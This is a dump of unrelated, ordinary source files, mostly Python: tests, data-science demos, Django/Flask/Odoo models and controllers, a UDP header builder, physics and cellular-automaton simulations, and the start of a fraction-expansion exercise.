"importStatement": "from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.management.management_maapi_gen import BlinkyManagementMaapi",
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"
},
{
"moduleYangNamespacePrefix": "qt-if",
"memberName": "link",
"yangName": "link",
"className": "BlinkyLinkMaapi",
"importStatement": "from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.link.link_maapi_gen import BlinkyLinkMaapi",
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"
},
{
"moduleYangNamespacePrefix": "qt-if",
"memberName": "device",
"yangName": "device",
"className": "BlinkyDeviceMaapi",
"importStatement": "from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.device.device_maapi_gen import BlinkyDeviceMaapi",
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"
}
],
"conditionalDebugName": null,
"operLeaves": [],
"module": {},
"configLeaves": [
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: IntHandler",
"memberName": "configurationDelay",
"yangName": "configuration-delay",
"object": "",
"leafrefPath": null,
"defaultVal": "0",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "muteReporting",
"yangName": "mute-reporting",
"object": "",
"leafrefPath": null,
"defaultVal": "false",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "sendGratuitousArp",
"yangName": "send-gratuitous-arp",
"object": "",
"leafrefPath": null,
"defaultVal": "true",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "shutdown",
"yangName": "shutdown",
"object": "",
"leafrefPath": null,
"defaultVal": "true",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "techMode",
"yangName": "tech-mode",
"object": "",
"leafrefPath": null,
"defaultVal": "false",
"hasDefaultRef": false
}
],
"env": {
"namespaces": [
"a",
"api",
"yang",
"modules",
"tech",
"common",
"qwilt_tech_interfaces"
]
},
"leaves": [
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: IntHandler",
"memberName": "configurationDelay",
"yangName": "configuration-delay",
"object": "",
"leafrefPath": null,
"defaultVal": "0",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "muteReporting",
"yangName": "mute-reporting",
"object": "",
"leafrefPath": null,
"defaultVal": "false",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "sendGratuitousArp",
"yangName": "send-gratuitous-arp",
"object": "",
"leafrefPath": null,
"defaultVal": "true",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "shutdown",
"yangName": "shutdown",
"object": "",
"leafrefPath": null,
"defaultVal": "true",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "techMode",
"yangName": "tech-mode",
"object": "",
"leafrefPath": null,
"defaultVal": "false",
"hasDefaultRef": false
}
],
"createTime": "2013"
}
"""
|
15,182 | 4e306e9710c605d03320a465a8a6a3d77f510295 | import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
# Define sample labels
true_labels = [2, 0, 0, 2, 4, 4, 1, 0, 3, 3, 3]
pred_labels = [2, 1, 0, 2, 4, 3, 1, 0, 1, 3, 3]
# Create confusion matrix
confusion_mat = confusion_matrix(true_labels, pred_labels)
# Visualize confusion matrix
plt.imshow(confusion_mat, interpolation='nearest', cmap=plt.cm.gray)
plt.title('Confusion matrix')
plt.colorbar()
ticks = np.arange(5)
plt.xticks(ticks, ticks)
plt.yticks(ticks, ticks)
plt.ylabel('True labels')
plt.xlabel('Predicted labels')
plt.show()
# Classification report
targets = ['Class-0', 'Class-1', 'Class-2', 'Class-3', 'Class-4']
print('\n', classification_report(true_labels, pred_labels, target_names=targets))
|
15,183 | 253437a16ef4d460ac7e9e7134cf1c78afd47f6f | """
Integration Tests
"""
from unittest import TestCase
from unittest.mock import MagicMock
from inventory_management.inventory import Inventory
from inventory_management.furniture import Furniture
from inventory_management.electric_appliances import ElectricAppliances
from inventory_management.market_prices import get_latest_price
class ModuleTests(TestCase):
def test_module(self):
rug = Inventory(7, "oriental_rug", 30, 5)
rug_info = rug.return_as_dictionary()
sofa = Furniture(5, "brown_sofa", 100, 20, "leather", "large")
sofa_info = sofa.return_as_dictionary()
tv = ElectricAppliances(6, "4k_tv", 2000, 50, "Panasonic", 220)
tv_info = tv.return_as_dictionary()
price = get_latest_price(8)
self.assertEqual(7, rug.product_code)
self.assertEqual("oriental_rug", rug_info["description"])
self.assertEqual("brown_sofa", sofa.description)
self.assertEqual(100, sofa_info["market_price"])
self.assertEqual(2000, tv.market_price)
self.assertEqual(50, tv_info["rental_price"])
self.assertEqual(24, get_latest_price(1))
|
15,184 | f9199ba008630a84d7204dff9a657597a05626ae | from collections import defaultdict, deque, Counter
import sys
from decimal import *
from heapq import heapify, heappop, heappush
import math
import random
import string
from copy import deepcopy
from itertools import combinations, permutations, product
from operator import mul, itemgetter
from functools import reduce, lru_cache
from bisect import bisect_left, bisect_right
def input():
return sys.stdin.readline().rstrip()
def getN():
return int(input())
def getNM():
return map(int, input().split())
def getList():
return list(map(int, input().split()))
def getArray(intn):
return [int(input()) for i in range(intn)]
sys.setrecursionlimit(1000000000)
mod = 10 ** 9 + 7
INF = float('inf')
dx = [1, 0, -1, 0]
dy = [0, 1, 0, -1]
#############
# Main Code #
#############
# 1 ~ nまでに各桁のフラグが何本立つか計算する関数
def bitflag(n, flaglist):
if n > 0:
for i in range(1, 61):
split = 2 ** i
flag1 = (n // split) * (split // 2)
flag2 = max(n % split + 1 - (split // 2), 0)
flaglist[i] += flag1 + flag2
l = [[0, 0] for i in range(61)]
# bitの各桁が1か0かをlistaに収納
def splitbit(n):
for i in range(61):
if n & (1 << i):
l[i][1] += 1
else:
l[i][0] += 1
for i in A:
splitbit(i)
# ABC126 F - XOR Matching
# 0 ~ 2^N - 1までには
# 2^0, 2^1...2^N-1のフラグがそれぞれ2^N-1本ずつあり
# xorの総和は0になる
# 2 と 1 3 4 5 6 7はxorの総和がそれぞれ2
M, K = getNM()
if M == 1:
if K == 0:
print(0, 1, 1, 0)
else:
print(-1)
exit()
if K >= 2 ** M:
print(-1)
exit()
res = [i for i in range(1 << M) if i != K]
res = [K] + res + [K] + res[::-1]
print(*res)
|
15,185 | f529029625ce29f7217ca13cdc133b071b25f20d | import requests
import numpy as np
from io import BytesIO
class Dataset(object):
def __init__(self, mvshlf_api, project_id):
self.mvshlf_api = mvshlf_api
self.project_id = project_id
def load_data(self, url = None):
if url is None:
dataset = self.mvshlf_api.getProjectDatasets(self.project_id)
url = dataset[0]['downloadUri']
r = requests.get(url, stream = True)
self.data = np.load(BytesIO(r.raw.read()))
def get_training_set(self):
return (self.data['train_patterns'], self.data['train_classes'])
def get_test_set(self):
return (self.data['test_patterns'], self.data['test_classes'])
def get_test_ids(self):
return self.data['test_ids']
def get_labels(self):
return self.data['class_labels'] |
15,186 | fc98eb8a48022b79fea79e4a4f98ba78b9b93a8f | import sp_cal_bandwidth
import sp_cal_betweenness
import sp_cal_coverage
import sp_cal_dij_delay
def get_parameters(path):
"""Get the parameters of mega-constellations
:param path: str, configuration file path of mega-constellations
:return parameter: two-dimensional list about parameter of constellations
"""
f = open(path, "r")
line = f.readline()
line = line.strip('\n')
values = line.split(',')
parameter = [[0 for i in range(len(values))] for i in range(6)]
row = 0
while line:
line = line.strip('\n')
values = line.split(',')
for i in range(len(values)):
if row != 0:
parameter[row][i] = (float)(values[i])
else:
parameter[row][i] = values[i]
row += 1
line = f.readline()
f.close()
return parameter
def perform_benchmark():
path = 'parameter.txt'
constellation_parameter = get_parameters(path)
sp_cal_dij_delay.dij_delay(constellation_parameter, error_rate=0, dT=1)
sp_cal_bandwidth.bandwidth(constellation_parameter,dT=60)
sp_cal_coverage.coverage(constellation_parameter)
sp_cal_betweenness.betweenness(constellation_parameter)
if __name__ == '__main__':
perform_benchmark()
|
15,187 | ae50437a62e872cc54f9b3b0d80b0ade528f8496 | """
PACKNET - c0mplh4cks
UDP
.---.--------------.
| 7 | Application |
|---|--------------|
| 6 | Presentation |
|---|--------------|
| 5 | Session |
#===#==============#
# 4 # Transport #
#===#==============#
| 3 | Network |
|---|--------------|
| 2 | Data Link |
|---|--------------|
| 1 | Physical |
'---'--------------'
"""
# === Importing Dependencies === #
from struct import pack, unpack
from .standards import encode, decode, checksum
# === UDP Header === #
class Header:
def __init__(self, packet=b""):
self.packet = packet
self.src = ["", 0, ""]
self.dst = ["", 0, ""]
self.length = 0
self.checksum = 0
self.data = b""
def build(self):
packet = []
self.length = 8 + len(self.data)
packet.insert(0, pack( ">H", self.src[1] )) # Source PORT
packet.insert(1, pack( ">H", self.dst[1] )) # Target PORT
packet.insert(2, pack( ">H", self.length )) # Total length
packet.insert(4, self.data ) # Data
packet.insert(3, checksum( [ # Checksum
*packet,
encode.ip( self.src[0] ),
encode.ip( self.dst[0] ),
pack( ">H", 17 ),
pack( ">H", self.length )
] ))
self.packet = b"".join(packet)
return self.packet
def read(self):
packet = self.packet
i = 0
i, self.src[1] = i+2, unpack( ">H", packet[i:i+2] )[0] # Source PORT
i, self.dst[1] = i+2, unpack( ">H", packet[i:i+2] )[0] # Target PORT
i, length = i+2, unpack( ">H", packet[i:i+2] )[0] # Total length
i, self.checksum = i+2, unpack( ">H", packet[i:i+2] )[0] # Checksum
i, self.data = i+len( packet[i:] ), packet[i:] # Data
self.length = i
return i
|
15,188 | f0db1e4b6b1c6b35d6e9ae1a348a9de55dd122d5 | #----------------------------------------------------------------------------
#
# Copyright (c) 2013-14, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in /LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
#
# Thanks for using Enthought open source!
#
#----------------------------------------------------------------------------
import unittest
from enable.api import Component
from traits.api import HasTraits, Instance
from traits_enaml.testing.enaml_test_assistant import EnamlTestAssistant
class Model(HasTraits):
component = Instance(Component)
class EnableCanvasTestCase(EnamlTestAssistant, unittest.TestCase):
def setUp(self):
EnamlTestAssistant.setUp(self)
enaml_source = """
from enaml.widgets.api import MainWindow
from traits_enaml.widgets.enable_canvas import EnableCanvas
enamldef MainView(MainWindow):
attr model
EnableCanvas:
name = 'canvas'
component << model.component
"""
self.component = Component()
self.model = Model(component=self.component)
view, toolkit_view = self.parse_and_create(
enaml_source, model=self.model
)
self.view = view
def tearDown(self):
self.component = None
self.view = None
self.model = None
EnamlTestAssistant.tearDown(self)
def test_using_enable_canvas_widget(self):
canvas = self.view.find('canvas')
with self.assertAtomChanges(canvas, 'component'):
self.model.component = Component()
canvas = None
def test_enable_canvas_proxy(self):
from enaml.qt.qt_raw_widget import QtRawWidget
canvas = self.view.find('canvas')
# Check that the proxy is strictly a QtRawWidget (not a subclass).
self.assertEqual(type(canvas.proxy), QtRawWidget)
|
15,189 | de308153762869c271eb0b07f30cf012592f58d7 | __author__ = 'am004929'
|
15,190 | c1301d84f1cc43350872c182bde6440e5bc35a68 | import re, urllib, urllib2, json
def jsonloads(string):
if dir(json).__contains__('loads'):
return json.loads(string)
return json.read(string)
def jsondumps(dict):
if dir(json).__contains__('dumps'):
return json.dumps(dict)
return json.write(dict)
def date_format(date):
date = re.sub(r'[-_\.: ]+', '', date)
yyyy = date[0:4]
mm = date[4:6]
dd = date[6:8]
return "%s-%s-%s" % (yyyy,mm,dd)
def call(method, dict):
params = urllib.urlencode({'params':jsondumps(dict)})
req = urllib2.Request('http://data.rcc-acis.org/%s' % method, params, {'Accept':'application/json'})
res = urllib2.urlopen(req)
x = res.read();
return jsonloads(x)
def contains(string,substring):
return string.find(substring) >= 0
def build_elem(name):
elem = {}
while contains(name,'_'):
if contains(name,'normal_'):
name = name.replace('normal_', '')
#elem['summary'] = 'normal'
elem['normal'] = '1'
elif contains(name,'ytd_'):
name = name.replace('ytd_', '')
elem['duration'] = 'ytd'
elem['reduce'] = 'sum'
else:
name = name.replace('_','')
elem['name'] = name
return elem
def build_elem_list(elemstrings):
elems = []
for arg in elemstrings:
if re.search(r'\{', arg):
elems.append(eval(arg))
else:
elems.append( build_elem(arg) )
return elems
|
15,191 | af43b4731f5e08208832be1bb1f6ee7f7ce6a0b1 | # -*- coding: utf-8 -*-
"""
Created on
@author: luolei
"""
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import copy
class Cell(object):
"""
定义元胞
"""
def __init__(self, center = np.array([0, 0]), state = 'dead'):
"""
初始化
:param center: 该元胞中心
:param state: 该元胞状态
"""
self.center = center
self.state = state
self.neighbors = dict()
def get_neighbors(self, cells, pool_size):
"""
获得该元胞四周的上下左右四个方向的邻居元胞信息
:param cells: 细胞总体信息字典
:param 环境尺寸
:return:
"""
neighbors = dict()
for direc in [0, 1]:
neighbors[direc] = dict()
for delta_loc in [-1, 1]:
neighbor_loc = copy.deepcopy(self.center)
neighbor_loc[direc] = neighbor_loc[direc] + delta_loc
if (neighbor_loc[direc] < 0) | (neighbor_loc[direc] > pool_size[direc] - 1):
neighbors[direc][delta_loc] = Cell(center = np.array([-1, -1]),
state = 'not exist')
else:
neighbors[direc][delta_loc] = cells[neighbor_loc[0]][neighbor_loc[1]]
self.neighbors = neighbors
def show_neighbors_states(self):
"""
显示邻居的存活状态
:return:
"""
print([self.neighbors[0][-1].state,
self.neighbors[0][1].state,
self.neighbors[1][-1].state,
self.neighbors[1][1].state])
def update_state(self):
"""更新该cell的状态"""
alive_num = 0
for direc in [0, 1]:
for delta_loc in [-1, 1]:
if self.neighbors[direc][delta_loc].state == 'alive':
alive_num += 1
self.alive_neighbors_num = alive_num
if (self.alive_neighbors_num >= 2):
self.state = 'dead'
elif (self.alive_neighbors_num >= 1) & (self.alive_neighbors_num < 2):
self.state = 'alive'
elif self.alive_neighbors_num < 1:
self.state = 'dead'
class Pool(object):
"""
元胞环境
"""
def __init__(self, pool_size = np.array([10, 10])):
"""
初始化pool
:param pool_size:
"""
self.pool_size = pool_size
"初始化pool"
self.cells = dict()
for i in range(self.pool_size[0]):
self.cells[i] = dict()
for j in range(self.pool_size[1]):
self.cells[i][j] = Cell(center = np.array([i, j]), state = 'dead')
def init_alive_cells(self, init_alive_cell_locs):
"""
初始化活cell
:param init_cell_loc_list:
:return:
"""
for loc in init_alive_cell_locs:
self.cells[loc[0]][loc[1]] = Cell(center = np.array(loc), state = 'alive')
def update_cells_states(self):
"""
更新pool中各cell的存活信息
:return:
"""
"获取所有邻居cell信息"
new_cells = dict()
for i in range(self.pool_size[0]):
new_cells[i] = dict()
for j in range(self.pool_size[1]):
cell = Cell(center = np.array([i, j]), state = self.cells[i][j].state)
cell.get_neighbors(self.cells, self.pool_size)
new_cells[i][j] = cell
"更新各cell信息"
for i in range(self.pool_size[0]):
for j in range(self.pool_size[1]):
cell = new_cells[i][j]
cell.update_state()
new_cells[i][j] = cell
self.cells = new_cells
def run_simulation(self, steps = 5, show_plot = False):
"""
进行模拟
:param steps:
:param show_plot:
:return:
"""
if show_plot == True:
plt.figure(figsize = [6, 6])
sns.set_style('darkgrid')
for step in range(steps):
"进行各cell的更新"
self.update_cells_states()
if show_plot == True:
cells_locs = []
colors_list = []
for i in range(self.pool_size[0]):
for j in range(self.pool_size[1]):
cells_locs.append([i, j])
if self.cells[i][j].state == 'alive':
colors_list.append('w')
else:
colors_list.append('k')
plt.clf()
plt.scatter([p[0] for p in cells_locs],
[p[1] for p in cells_locs],
c = colors_list,
marker = 's',
s = 60,
edgecolors = 'k')
plt.hold(True)
plt.legend(['step = %s' % step])
plt.tight_layout()
plt.show()
plt.pause(0.1)
if __name__ == '__main__':
Pool = Pool(pool_size = np.array([100, 100]))
init_alive_cell_locs = [[50, 51],
[51, 51],
[52, 51],
[51, 52],
[51, 50],
[50, 52],
[52, 50]]
Pool.init_alive_cells(init_alive_cell_locs)
Pool.run_simulation(steps = 500, show_plot = True)
cell = Pool.cells[3][4]
cell.get_neighbors(Pool.cells, Pool.pool_size)
cell.show_neighbors_states()
cell.update_state() |
15,192 | cef2ab5c13f31d6f8278d04fa96a018fa16bf3b0 | ####################################################################################
###
### Program to find eigenenergies of the infinite square well.
###
####################################################################################
# Importing useful stuff
from numpy import *
from matplotlib.pyplot import *
import scipy.integrate
import numpy as np
import matplotlib.pyplot as plt
# Defining potential
def infinite_well(z):
W = zeros(len(z))
return W
# Constants and parameters
N = 500 # number of points
z = np.linspace(0,1,N) # position array
dz = z[1]-z[0] # step length
tol = 0.1 # tolerance level
W = infinite_well(z) # getting potential
a = 0.4 # width of well [nm]
hbarc = 197.3 # eV nm
mc2 = 0.511*10**6 # eV
Psi = np.zeros(N) # wave function
Psi[0] = 0 # initial condition (function must die in endpoints)
Psi[1] = 0.1 # initial condition
epsilon = [] # list to be filled with epsilon
epsilon_anal = [] # analtyic energy list to be filled
E_n = [] # analytical energies
E = [] # numerical energies
lastpsi = [] # value of last psi
Psi_list = [] # list to store the best Psi
epsilon_trial = 9 # trial eigenvalue
# For plotting numerical solutions with index
number = 0 # in use when labelling wavefunctions in plot
colors = 'cmygbcmygb' # for different colors in plot
color_index = 0
# Search for correct eigenvalue
while epsilon_trial < 160:
# Calculating wave function
for j in range(1,N-1):
Psi[j+1] = (2 - dz**2*(epsilon_trial-W[j+1]))*Psi[j] - Psi[j-1]
# Normalizing
Psi /= sqrt(scipy.integrate.simps(abs(Psi)**2,dx=1e-3))
# Store value of last element in Psi
Psi_end = abs(Psi[-1])
# Check if last element is within tolerance
if Psi_end < tol:
epsilon.append(epsilon_trial)
lastpsi.append(Psi_end)
Psi_list.append(list(Psi)) # add as list to make it behave well
# Only keep those epsilon and Psi giving minimal value of Psi[-1]
if len(lastpsi) > 1 and (epsilon[-1] - epsilon[-2]) < 2:
if lastpsi[-1] < lastpsi[-2]:
lastpsi.remove(lastpsi[-2])
epsilon.remove(epsilon[-2])
Psi_list.remove(Psi_list[-2])
if lastpsi[-1] > lastpsi[-2]:
lastpsi.remove(lastpsi[-1])
epsilon.remove(epsilon[-1])
Psi_list.remove(Psi_list[-1])
# Update trial eigenvalue
epsilon_trial += 0.4
# Physical energies
for i in range(0,len(epsilon)):
eps = epsilon[i]
E_phys = eps*hbarc**2/(2*mc2*a**2)
E.append(E_phys)
# ANALYTIC SOLUTIONS
num = [1,2,3,4]
# Determining energy and wavefunction:
for n in num:
E_physical = n**2*hbarc**2*pi**2/(2*mc2*a**2)
E_n.append(E_physical)
Psi_anal = sin(pi*z*n)
# Normalizing:
Psi_anal /= sqrt(scipy.integrate.simps(abs(Psi_anal)**2,dx=1e-3))
plot(z,Psi_anal,'k--')
# Print lists of energies
print '-------------------------------------------------------------------------------------------------'
print 'Energy levels of infinite potential well of width %.2f nm:' %a
print '-------------------------------------------------------------------------------------------------'
print 'Epsilon: ',epsilon
print 'Numerical energies E [eV]: ', E
print 'Analytical energies En [eV]: ', E_n
print '-------------------------------------------------------------------------------------------------'
# Plotting
for i in range(len(Psi_list)):
Legend = '$\psi_%d$' % (number)
plot(z,Psi_list[i],color=colors[color_index],label=Legend)
number += 1
color_index += 1
# Axes and title
plt.title('$Infinite \ well$',size=20)
plt.xlabel('$z = x/a$',size=18)
plt.ylabel('$\psi(z)$',size=18)
plot([0,0],[0,0],'k--',label='$Analytical$')
plt.legend(loc='best')
show() |
15,193 | 3c353924ea97480994f92eb71a614205c1703e48 | # -*- coding: utf-8 -*-
"""
Created on Sun Nov 18 11:27:23 2018
@author: Saverio
"""
import re
testString = "Questo è un esempio di #tag che voglio #individuare per assegnare ad @ale cosa fare come @compito"
def parseHastags(intext):
# create a regex to match a hashtag followed by any number of chars
hashMatch = re.compile(r'#\w*')
matchList = hashMatch.findall(intext)
return(matchList)
def parseAssignations(intext):
# create a regex to match a @ assignation
hashMatch = re.compile(r'@\w*')
matchList = hashMatch.findall(intext)
return(matchList)
def cleantext(intext):
# remove hastags and assignations and returns the text cleaned
outText = []
for character in intext:
print(character)
if character != '@' and character != '#':
outText.append(character)
return(''.join(outText))
def parseValidInputs(validEntryToParse, userInput):
# the valid argument will be a letter in curve brackets
validInputs = re.compile(r'\(\w*\)')
toCheck = validInputs.findall(validEntryToParse)
# to use the letter strip the brackets from the results
for element in range(0,len(toCheck)):
toCheck[element] = toCheck[element].strip('(')
toCheck[element] = toCheck[element].strip(')')
# since the user will give upper or lowercase inputs add to the list
# all the lower and uppercase versions of the valid inputs
for element in range(0,len(toCheck)):
if toCheck[element].isupper():
if toCheck[element].lower() not in toCheck:
toCheck.append(toCheck[element].lower())
elif toCheck[element].islower():
if toCheck[element].upper() not in toCheck:
toCheck.append(toCheck[element].upper())
# check if the user input is in the list of the valid values
if userInput in toCheck:
return(userInput)
else:
return(False)
hastags = parseHastags(testString)
assignations = parseAssignations(testString)
testoPulito = cleantext(testString)
|
15,194 | 959dd85e4090579ea181b9325fa83d7bf81ce5ed | from django.db import models
from django.contrib.auth.models import User
DEFAULT_TITLE = 'Teksti'
class Word(models.Model):
"""Word with its translation and some linguistic properties"""
# Gender choices
FEMININE = 'f'
MASCULINE = 'm'
NEUTER = 'n'
# Part-of-speech tags as in spacy.io.annotation
ADJECTIVE = 'ADJ'
ADPOSITION = 'ADP'
ADVERB = 'ADV'
AUXILIARY = 'AUX'
CONJUNCTION = 'CONJ'
CCONJUNCTION = 'CCONJ'
DETERMINER = 'DET'
INTERJECTION = 'INTJ'
NOUN = 'NOUN'
NUMERAL = 'NUM'
PARTICLE = 'PART'
PRONOUN = 'PRON'
PROPERNOUN = 'PROPN'
SCONJUNCTION = 'SCONJ'
SYMBOL = 'SYM'
VERB = 'VERB'
OTHER = 'X'
SPACE = 'SPACE'
# Language choices
FRENCH = 'fr'
FINNISH = 'fi'
ITALIAN = 'it'
ENGLISH = 'en'
GENDER_CHOICES = (
(FEMININE, 'Feminine'),
(MASCULINE, 'Masculine'),
(NEUTER, 'Neuter'),
)
POS_CHOICES = (
(ADJECTIVE, 'Adjective'),
(ADPOSITION, 'Adposition'),
(ADVERB, 'Adverb'),
(AUXILIARY, 'Auxiliary'),
(CONJUNCTION, 'Conjunction'),
(CCONJUNCTION, 'Coordinating conjunction'),
(DETERMINER, 'Determiner'),
(INTERJECTION, 'Interjection'),
(NOUN, 'Noun'),
(NUMERAL, 'Numeral'),
(PARTICLE, 'Particle'),
(PRONOUN, 'Pronoun'),
(PROPERNOUN, 'Proper noun'),
(SCONJUNCTION, 'Subordinating conjunction'),
(SYMBOL, 'Symbol'),
(VERB, 'Verb'),
(OTHER, 'Other'),
(SPACE, 'Space'),
)
LANGUAGE_CHOICES = (
(FRENCH, 'French'),
(FINNISH, 'Finnish'),
(ITALIAN, 'Italian'),
(ENGLISH, 'English'),
)
lemma = models.CharField(max_length=255)
translation = models.CharField(max_length=255)
pos = models.CharField(
max_length=5, choices=POS_CHOICES, verbose_name='Part-of-speech'
)
gender = models.CharField(max_length=1, choices=GENDER_CHOICES, null=True)
pronunciation = models.CharField(max_length=255, null=True)
source_lang = models.CharField(
max_length=2, choices=LANGUAGE_CHOICES, verbose_name='Source language'
)
target_lang = models.CharField(
max_length=2, choices=LANGUAGE_CHOICES, verbose_name='Target language'
)
created_date = models.DateTimeField(auto_now_add=True)
created_by = models.ForeignKey(
User,
on_delete=models.SET_NULL,
null=True,
related_name='word_created_by'
)
modified_date = models.DateTimeField(auto_now=True, null=True)
modified_by = models.ForeignKey(
User,
on_delete=models.SET_NULL,
null=True,
related_name='word_modified_by'
)
class Meta:
ordering = ['lemma']
unique_together = [
'lemma',
'pos',
'gender',
'target_lang',
'source_lang'
]
def __str__(self):
return self.lemma + ' (' + self.pos + ') -> ' + self.translation
class Chapter(models.Model):
"""Analyzed text"""
# Language choices
FRENCH = 'fr'
FINNISH = 'fi'
ITALIAN = 'it'
ENGLISH = 'en'
LANGUAGE_CHOICES = (
(FRENCH, 'French'),
(FINNISH, 'Finnish'),
(ITALIAN, 'Italian'),
(ENGLISH, 'English'),
)
title = models.CharField(max_length=255, default=DEFAULT_TITLE)
body = models.TextField()
public = models.BooleanField(default=False)
created_date = models.DateTimeField(auto_now_add=True)
modified_date = models.DateTimeField(auto_now=True)
created_by = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name='chapter_created_by'
)
modified_by = models.ForeignKey(
User,
on_delete=models.CASCADE,
null=True,
related_name='chapter_modified_by'
)
words = models.ManyToManyField('Word', through='WordProperties')
source_lang = models.CharField(
max_length=2, choices=LANGUAGE_CHOICES, verbose_name='Source language'
)
target_lang = models.CharField(
max_length=2, choices=LANGUAGE_CHOICES, verbose_name='Target language'
)
class Meta:
ordering = ['public', 'title']
def __str__(self):
return self.title + ': ' + self.body[:50] + '...'
def summary(self):
return self.body[:100]
class WordProperties(models.Model):
"""Word information related to chapter"""
word = models.ForeignKey('Word', on_delete=models.CASCADE)
token = models.CharField(max_length=255, default='', blank=True)
frequency = models.IntegerField(default=0)
chapter = models.ForeignKey('Chapter', on_delete=models.CASCADE)
class Meta:
verbose_name_plural = 'Word Properties'
class LearningData(models.Model):
"""Words that user has practiced"""
word = models.ForeignKey('Word', on_delete=models.CASCADE)
user = models.ForeignKey(User, on_delete=models.CASCADE)
learned = models.BooleanField(default=False)
class Meta:
verbose_name_plural = 'Learning Data'
ordering = ['word']
unique_together = ['word', 'user']
|
15,195 | 43a97eaf4c3a6ff9eb451b901fb281d051874cdf | from marshmallow_jsonapi.flask import Schema
from marshmallow_jsonapi import fields
class SchemaAirState(Schema):
class Meta:
type_ = 'air_state'
self_view = 'air_state_detail'
self_view_kwargs = {'id': '<id>'}
self_view_many = 'air_state_list'
# id = fields.Integer(as_string=True, dump_only=True) # make troubles during update.
id = fields.Integer(as_string=True, required=False, missing=None, allow_none=True)
temperature = fields.Decimal(required=True)
humidity = fields.Decimal(required=True)
location = fields.Str(required=True)
device = fields.Str(required=True)
created = fields.DateTime(format="%Y-%m-%d %H:%M:%S")
class SchemaInsolation(Schema):
class Meta:
type_ = 'insolation'
self_view = 'insolation_detail'
self_view_kwargs = {'id': '<id>'}
self_view_many = 'insolation_list'
# id = fields.Integer(as_string=True, dump_only=True) # make troubles during update.
id = fields.Integer(as_string=True, required=False, missing=None, allow_none=True)
insolation = fields.Integer(required=True)
device = fields.Str(required=True)
created = fields.DateTime(format="%Y-%m-%d %H:%M:%S")
|
15,196 | be35b04d005fec53f002d455681474780de1dcf0 | # -*- coding: utf-8 -*-
import logging
from odoo import http
from odoo.http import request
from odoo.addons.website.controllers.main import Website
import requests
logger = logging.getLogger(__name__)
class WebsiteReload(Website):
@http.route('/server-not-found', type='http', auth="public", website=True)
def reload(self, **kw):
not_found_host = not_found_scheme = not_found_server = None
# url = request.httprequest.headers.get('Referer')
url = request.httprequest.url
query = requests.utils.urlparse(url).query
params = dict(x.split('=') for x in query.split('&'))
if 'not_found_host' in params and 'not_found_scheme' in params and \
'not_found_server' in params:
not_found_host = params['not_found_host']
not_found_scheme = params['not_found_scheme']
not_found_server = params['not_found_scheme']
values = {
'not_found_host': not_found_host,
'not_found_scheme': not_found_scheme,
'not_found_server': not_found_server
}
return request.render("redirect_page.404_custom", values)
|
15,197 | 7ef9402cc6759b5659d4df466df31d858f530d7b | # Written by *** and Eric Martin for COMP9021
'''
Prompts the user for two strictly positive integers, numerator and denominator.
Determines whether the decimal expansion of numerator / denominator is finite or infinite.
Then computes integral_part, sigma and tau such that numerator / denominator is of the form
integral_part . sigma tau tau tau ...
where integral_part in an integer, sigma and tau are (possibly empty) strings of digits,
and sigma and tau are as short as possible.
'''
import math
import sys
from math import gcd
from math import sqrt
try:
numerator, denominator = input('Enter two strictly positive integers: ').split()
except ValueError:
print('Incorrect input, giving up.')
sys.exit()
try:
numerator, denominator = int(numerator), int(denominator)
if numerator <= 0 or denominator <= 0:
raise ValueError
except ValueError:
print('Incorrect input, giving up.')
sys.exit()
has_finite_expansion = False
sigma = ''
tau = ''
integral_part=0
if numerator % denominator == 0:
has_finite_expansion = True
integral_part=int(numerator / denominator)
else:
transform = gcd(numerator, denominator)
numerator_gcd = int(numerator / transform)
denominator_gcd = int(denominator / transform)
integral_part=str(int(numerator // denominator))
L=[]
